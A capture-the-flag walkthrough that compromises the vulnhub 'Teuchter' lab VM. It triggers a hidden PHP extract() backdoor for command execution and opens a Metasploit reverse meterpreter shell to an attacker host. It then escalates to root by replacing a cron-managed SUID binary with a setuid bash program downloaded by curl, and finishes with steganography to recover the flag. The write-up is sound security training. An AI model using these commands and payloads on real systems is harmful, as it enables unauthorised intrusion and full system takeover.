CTF Challenges

Hack the Teuchter VM (CTF Challenge)

This post is on the latest CTF challenge “Teuchter” presented by vulnhub for penetration practice and design by knightmare. This virtual machine is having intermediate to the medium difficulty level. One need to break into VM using the web application and from there escalate privileges to gain root access.

Download it from here: https://www.vulnhub.com/entry/teuchter-03,163/

Penetrating Methodologies

  • Network Scanning (netdiscover, Nmap)
  • Abusing HTTP service for PHP extract backdoor
  • Compromise victim’s (Metasploit)
  • SUID Privilege escalation
  • Steganography for original flag.txt

Lets Start!!!

Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.104

Knowing port 80 is open in the victim’s network I preferred to explore his IP in a browser. At first glance, we saw following web page.  When couldn’t found something suspicious, so we try to check its source-code

Hmmm!! After exploring the source code page, you can analysis the “Green color text” sounds a little bit doubtful. Giving priority to /gallery /flicks and /telly we have considered them as the subjective web directories and then try to explore it in the web browser.

Also, consider hint given for some extension like .pht for PHP.

So I opened the URL http://192.168.1.104/gallery/ but couldn’t get anything neither from its web page nor from its source code.

Then explored the URL http://192.168.1.104/telly/ and it put-up following web page in front of us and at looking at its page source code we notice something like flicks phpinfo.

So without wasting time, we lunch directory brute-force attack on the following URL for identifying .php and .pht extension files.

dirb http://192.168.1.104/flicks/ -X .php,.pht

And from its result, we find a phpinfo.pht file and explored it in the browser and it gives me an internal server error when I open it. So I search in Google phpinfo.php found this link: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

Thanks to Mr. Daniel B. Cid for sharing his experience because with help of above link we get the idea to exploit it. As the author has hidden the PHP extract backdoor inside the phpinfo.pht file and now whatever the attacker sends as “ctime” with “atime” as an argument it will be executed successfully.

As you can observe when we try to execute the system command “id” through the given below URL we got following result on the web page.

192.168.1.104/flicks/phpinfo.php?ctime=system&atime=id

Let’s compromise the victim’s VM to get the meterpreter shell, therefore, we load the Metasploit framework and execute below commands.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.107
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for malicious PHP code and Paste it inside the URL as an argument.

You will get the meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing the flag.txt file. Further type following for extracting more information for post exploitation.

Here first I sysinfo command to enumerate install kernel version but didn’t found any working exploit for this VM therefore then I decide to go with the manual approach for privilege escalation. Thus execute below commands:

cd /home
ls
cd proclaimers
ls
cd letterfromamerica
ls

Here I found two files semaphore and test and if you will notice at their permissions then you will realize that SUID bit enabled for semaphore and GUID bit is enabled for test.

Now let access proper tty shell of victim’s VM and enumerate furthermore inside it.

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

ooh!! I got something suspicious file a login.txt from inside /home/jkerr,  and promisedyouamiracle.jpg image. And after reading the note of the login.txt file I decided to download jpg image in our local machine.

Since the python 3 is already running, therefore, we execute the following command for transferring file.

python3 -m http.server 8080

When we explored the promisedyouamiracle.jpg image in the browser we got the following photo.

With help of exiftool, we try to extract metadata from inside this image and luckily found the bas64 encoded text.

exiftool promisedyouamiracle.jpg

With the help of the following command, we try to decode the text and got “gemini” which could be a possible password.

echo "Z2VtaW5pCg==" | base64 -d

Let try to login by using gemini as a password for user: proclaimers because it holds two important files. Execute the following commands and extract the information.

su proclaimers
password: gemini
ls
cd proclaimers
ls
cd letterfromamerica
ls -al

Oh Great!! As declared above SUID bit enabled for the semaphore and GUID bit enabled for the test, let’s use grep command to get everything related to semaphore.

grep -R "semaphore" /usr/local 2>/dev/null

Awesome, I got a script at this path /usr/local/bin/numpties.sh; let’s open it with cat command.

cat /usr/local/bin/numpties.sh

After reading it, I conclude that the cronjob will add the SUID bit to semaphore and also give root ownership to this file if the file exists.

No wonder, if I replace the original semaphore by the fake semaphore file then our fake file will get SUID permission. So in our local, we write a C-program to get bash shell and compile it.

include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
Int main ()
{
setuid(geteuid ());
system("/bin/bash");
}
gcc shell.c -o semaphore
python -m SimpleHTTPServer 80

 

Since we have compiled file semaphores and also running python server, therefore, let’s download our fake semaphore at the place of original semaphores. Thus first I removed original semaphores and download compiled file in the same directory.

rm -rf  semaphore
curl -O http://192.168.1.107/semaphore

After sometime when I checked the permission for the new semaphore I found the SUID bit was on. At that moment you should run the script which will give root terminal after getting executed and then look for flag inside /root directory.

ls -la
./semaphore
cd /root
cat flag.txt

This was not actual flag let’s try to get the original flag 

cd root
ls
re-record-not-fade-away
ls -al
cd on
ls 
cd and
ls
cd on

So on………… and at last you will get /ariston which is holding a zip file “TeuchterESX.zip”.

cd ariston

Again run the following command in the current directory to transfer zip file.

python3 -m http.server 8080

Now download TeuchterESX.zip file in local machine and unzip it.

wget http://192.168.1.103:8080/TeuchterESX.zip
unzip TeuchterESX.zip
password: Teuchter

We got a vmdk file and further I run following command to the list of present drive for mounting disk image.

fdisk -l

Here we saw /dev/sdb1 which looks good mounting disk image thus I install the vmfs-tools package.

So we have used vmfs-fuse to mount the drive and execute the following commands:

mkdir Teuchter
vmfs-fuse /dev/sdb1 /root/Desktop/Teuchter/
cd Teuchter
ls
cat hint.txt
cd redkola

In this text messages the author had given hint to check ISO for getting the password which is related to TV advert and it’s of 25 characters.

So we mount the new folder /redkola.iso where we found an image file glass_ch.jpg with help of the following command:

mount redkola.iso /root/Desktop/redkola
cd /root/Desktop/redkola
ls

Further, we opened the image “glass_ch.jpg” and it was a picture of Irn-Bru soft-drinks. Probably there could be chances of hidden text in this image, therefore, we tried steghide to extract out hidden text but when I execute the following command it asks to enter some passphrase which we don’t know yet and it should above said 25 characters which we need to be found.

steghide extract -sf glass_ch.jpg -xf /root/Desktop/finalflag.txt

Taking help of above hint and image I search Irn-bru-wiki and got this link https://en.wikipedia.org/wiki/Irn-Bru

And after spending a long time over wiki I got 25 characters in ‘madeinscotlandfromgirders’, which was Irn-Bru advertising slogan and tried it as the passphrase.

We entered the above passphrase and extracted the text file on the desktop.

Congrats!! Finally, we got the final flag.txt

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here